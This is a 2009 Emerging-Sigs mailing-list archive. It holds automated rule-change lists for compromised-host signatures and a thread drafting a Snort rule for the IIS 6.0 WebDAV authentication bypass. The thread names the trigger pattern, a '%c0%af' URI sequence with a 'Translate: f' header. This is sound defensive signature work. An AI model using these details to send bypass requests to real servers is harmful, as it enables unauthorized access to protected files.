        2510106 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510107 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510108 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510109 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510110 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510111 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510112 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510113 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510114 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510115 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510116 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510117 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510118 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510119 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510120 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510121 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510122 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510123 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510124 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510125 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510126 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510127 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510128 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510129 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510130 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510131 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510132 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510138 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Removed from emerging-virus.rules (1):
        #By Tom Fischer


From dxp2532 at gmail.com  Sun May 17 00:55:18 2009
From: dxp2532 at gmail.com (dxp)
Date: Sun, 17 May 2009 00:55:18 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
Message-ID: <1242536118.7390.20.camel@kinta>

The text by Kingcope on milw0rm does specify the "translage: f" header
in the first two examples.  I have not tested this but it appears, if I
read the advisory correctly, that this additional header is required to
exploit the vulnerability.  Without it the signature would pick up on
many different web scans and woulld not be specific to this
vulnerability.
-  

-=[ dxp ]=-
0xA3F3C6E3



On Sat, 2009-05-16 at 17:13 -0400, Nick Randolph wrote:

> I'm submitting this for the recent IIS 6.0 vulnerability
> http://isc.sans.org/diary.html?storyid=6397
> 
> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af";
> nocase; reference:url,isc.sans.org/diary.html?storyid=6397;
> sid:xxxxxx; gid:1; rev:1;)
> 
> I also read that "translate: f" was required but the information on
> milw0rm.com did not use that in all 3 examples.
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090517/4276846f/attachment.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090517/4276846f/attachment.bin

From phatbuckett at gmail.com  Sun May 17 09:28:45 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Sun, 17 May 2009 06:28:45 -0700
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242536118.7390.20.camel@kinta>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<1242536118.7390.20.camel@kinta>
Message-ID: <839aec700905170628u5447a823xe185abc6e2d68d04@mail.gmail.com>

Would it work the way I think to flowbit the request (with the
submitted rule) and look for a 200 status code in the response to flag
successful exploitation? I'd expect a failure would result in
something like a 40x (unauthorized, not found) or other error code.

DS

On Sat, May 16, 2009 at 9:55 PM, dxp <dxp2532 at gmail.com> wrote:
> The text by Kingcope on milw0rm does specify the "translage: f" header in
> the first two examples.? I have not tested this but it appears, if I read
> the advisory correctly, that this additional header is required to exploit
> the vulnerability.? Without it the signature would pick up on many different
> web scans and woulld not be specific to this vulnerability.
>
> -
>
> -=[ dxp ]=-
> 0xA3F3C6E3
>
>
>
> On Sat, 2009-05-16 at 17:13 -0400, Nick Randolph wrote:
>
> I'm submitting this for the recent IIS 6.0 vulnerability
> http://isc.sans.org/diary.html?storyid=6397
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af";
> nocase; reference:url,isc.sans.org/diary.html?storyid=6397;
> sid:xxxxxx; gid:1; rev:1;)
>
> I also read that "translate: f" was required but the information on
> milw0rm.com did not use that in all 3 examples.
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>



-- 
Darren Spruell
phatbuckett at gmail.com

From dxp2532 at gmail.com  Sun May 17 13:12:50 2009
From: dxp2532 at gmail.com (dxp)
Date: Sun, 17 May 2009 13:12:50 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <839aec700905170628u5447a823xe185abc6e2d68d04@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<1242536118.7390.20.camel@kinta>
	<839aec700905170628u5447a823xe185abc6e2d68d04@mail.gmail.com>
Message-ID: <1242580370.7390.33.camel@kinta>

That's a good idea.  However, I think there may be a need for some to
see alerts on attempts.  So, adding a flowbits in the first rule is good
as long as the "noalert" is excluded.  Then a second rule for HTTP 200
and check the first flowbit, with increased priority.

PS: perhaps having a generic flowbits rules for common HTTP status codes
maybe useful, to avoid redundant rules which rely on responses.  This
probably depends on what's currently in the ruleset, I haven't checked.
-  

-=[ dxp ]=-
0xA3F3C6E3



On Sun, 2009-05-17 at 06:28 -0700, Darren Spruell wrote:

> Would it work the way I think to flowbit the request (with the
> submitted rule) and look for a 200 status code in the response to flag
> successful exploitation? I'd expect a failure would result in
> something like a 40x (unauthorized, not found) or other error code.
> 
> DS
> 
> On Sat, May 16, 2009 at 9:55 PM, dxp <dxp2532 at gmail.com> wrote:
> > The text by Kingcope on milw0rm does specify the "translage: f" header in
> > the first two examples.  I have not tested this but it appears, if I read
> > the advisory correctly, that this additional header is required to exploit
> > the vulnerability.  Without it the signature would pick up on many different
> > web scans and woulld not be specific to this vulnerability.
> >
> > -
> >
> > -=[ dxp ]=-
> > 0xA3F3C6E3
> >
> >
> >
> > On Sat, 2009-05-16 at 17:13 -0400, Nick Randolph wrote:
> >
> > I'm submitting this for the recent IIS 6.0 vulnerability
> > http://isc.sans.org/diary.html?storyid=6397
> >
> > alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> > Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af";
> > nocase; reference:url,isc.sans.org/diary.html?storyid=6397;
> > sid:xxxxxx; gid:1; rev:1;)
> >
> > I also read that "translate: f" was required but the information on
> > milw0rm.com did not use that in all 3 examples.
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >
> >
> 
> 
> 
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090517/a98de0e4/attachment.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090517/a98de0e4/attachment.bin

From emerging at emergingthreats.net  Sun May 17 16:00:11 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sun, 17 May 2009 16:00:11 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090517200011.3AE734504B@goliath.jonkmans.com>


[***] Results from Oinkmaster started Sun May 17 16:00:11 2009 [***]

[*] Rules modifications: [*]
    None.

[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (100):
        2500081 || ET COMPROMISED Known Compromised or Hostile Host Traffic (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500082 || ET COMPROMISED Known Compromised or Hostile Host Traffic (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500083 || ET COMPROMISED Known Compromised or Hostile Host Traffic (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500084 || ET COMPROMISED Known Compromised or Hostile Host Traffic (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500085 || ET COMPROMISED Known Compromised or Hostile Host Traffic (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500086 || ET COMPROMISED Known Compromised or Hostile Host Traffic (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500087 || ET COMPROMISED Known Compromised or Hostile Host Traffic (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500088 || ET COMPROMISED Known Compromised or Hostile Host Traffic (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500089 || ET COMPROMISED Known Compromised or Hostile Host Traffic (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500090 || ET COMPROMISED Known Compromised or Hostile Host Traffic (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500091 || ET COMPROMISED Known Compromised or Hostile Host Traffic (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500092 || ET COMPROMISED Known Compromised or Hostile Host Traffic (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500093 || ET COMPROMISED Known Compromised or Hostile Host Traffic (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500094 || ET COMPROMISED Known Compromised or Hostile Host Traffic (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500095 || ET COMPROMISED Known Compromised or Hostile Host Traffic (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500096 || ET COMPROMISED Known Compromised or Hostile Host Traffic (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500097 || ET COMPROMISED Known Compromised or Hostile Host Traffic (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500098 || ET COMPROMISED Known Compromised or Hostile Host Traffic (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500099 || ET COMPROMISED Known Compromised or Hostile Host Traffic (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500100 || ET COMPROMISED Known Compromised or Hostile Host Traffic (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500101 || ET COMPROMISED Known Compromised or Hostile Host Traffic (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500102 || ET COMPROMISED Known Compromised or Hostile Host Traffic (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500103 || ET COMPROMISED Known Compromised or Hostile Host Traffic (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500104 || ET COMPROMISED Known Compromised or Hostile Host Traffic (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500105 || ET COMPROMISED Known Compromised or Hostile Host Traffic (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500106 || ET COMPROMISED Known Compromised or Hostile Host Traffic (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500107 || ET COMPROMISED Known Compromised or Hostile Host Traffic (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500108 || ET COMPROMISED Known Compromised or Hostile Host Traffic (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500109 || ET COMPROMISED Known Compromised or Hostile Host Traffic (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500110 || ET COMPROMISED Known Compromised or Hostile Host Traffic (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500111 || ET COMPROMISED Known Compromised or Hostile Host Traffic (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500112 || ET COMPROMISED Known Compromised or Hostile Host Traffic (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500113 || ET COMPROMISED Known Compromised or Hostile Host Traffic (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500114 || ET COMPROMISED Known Compromised or Hostile Host Traffic (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500115 || ET COMPROMISED Known Compromised or Hostile Host Traffic (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500116 || ET COMPROMISED Known Compromised or Hostile Host Traffic (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500117 || ET COMPROMISED Known Compromised or Hostile Host Traffic (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500118 || ET COMPROMISED Known Compromised or Hostile Host Traffic (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500119 || ET COMPROMISED Known Compromised or Hostile Host Traffic (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500120 || ET COMPROMISED Known Compromised or Hostile Host Traffic (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500121 || ET COMPROMISED Known Compromised or Hostile Host Traffic (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500122 || ET COMPROMISED Known Compromised or Hostile Host Traffic (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500123 || ET COMPROMISED Known Compromised or Hostile Host Traffic (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500124 || ET COMPROMISED Known Compromised or Hostile Host Traffic (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500125 || ET COMPROMISED Known Compromised or Hostile Host Traffic (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500126 || ET COMPROMISED Known Compromised or Hostile Host Traffic (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500127 || ET COMPROMISED Known Compromised or Hostile Host Traffic (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500128 || ET COMPROMISED Known Compromised or Hostile Host Traffic (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500129 || ET COMPROMISED Known Compromised or Hostile Host Traffic (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500130 || ET COMPROMISED Known Compromised or Hostile Host Traffic (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510081 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510082 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510083 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510084 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510085 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510086 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510087 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510088 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510089 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510090 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510091 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510092 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510093 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510094 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510095 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510096 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510097 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510098 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510099 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510100 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510101 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510102 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510103 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510104 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510105 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510106 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510107 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510108 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510109 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510110 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510111 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510112 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510113 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510114 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510115 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510116 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510117 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510118 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510119 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510120 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510121 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510122 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510123 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510124 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510125 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510126 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510127 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510128 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510129 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510130 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-sid-msg.map.txt (100):
        2500081 || ET COMPROMISED Known Compromised or Hostile Host Traffic (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500082 || ET COMPROMISED Known Compromised or Hostile Host Traffic (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500083 || ET COMPROMISED Known Compromised or Hostile Host Traffic (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500084 || ET COMPROMISED Known Compromised or Hostile Host Traffic (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500085 || ET COMPROMISED Known Compromised or Hostile Host Traffic (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500086 || ET COMPROMISED Known Compromised or Hostile Host Traffic (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500087 || ET COMPROMISED Known Compromised or Hostile Host Traffic (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500088 || ET COMPROMISED Known Compromised or Hostile Host Traffic (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500089 || ET COMPROMISED Known Compromised or Hostile Host Traffic (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500090 || ET COMPROMISED Known Compromised or Hostile Host Traffic (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500091 || ET COMPROMISED Known Compromised or Hostile Host Traffic (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500092 || ET COMPROMISED Known Compromised or Hostile Host Traffic (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500093 || ET COMPROMISED Known Compromised or Hostile Host Traffic (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500094 || ET COMPROMISED Known Compromised or Hostile Host Traffic (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500095 || ET COMPROMISED Known Compromised or Hostile Host Traffic (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500096 || ET COMPROMISED Known Compromised or Hostile Host Traffic (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500097 || ET COMPROMISED Known Compromised or Hostile Host Traffic (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500098 || ET COMPROMISED Known Compromised or Hostile Host Traffic (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500099 || ET COMPROMISED Known Compromised or Hostile Host Traffic (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500100 || ET COMPROMISED Known Compromised or Hostile Host Traffic (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500101 || ET COMPROMISED Known Compromised or Hostile Host Traffic (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500102 || ET COMPROMISED Known Compromised or Hostile Host Traffic (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500103 || ET COMPROMISED Known Compromised or Hostile Host Traffic (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500104 || ET COMPROMISED Known Compromised or Hostile Host Traffic (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500105 || ET COMPROMISED Known Compromised or Hostile Host Traffic (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500106 || ET COMPROMISED Known Compromised or Hostile Host Traffic (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500107 || ET COMPROMISED Known Compromised or Hostile Host Traffic (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
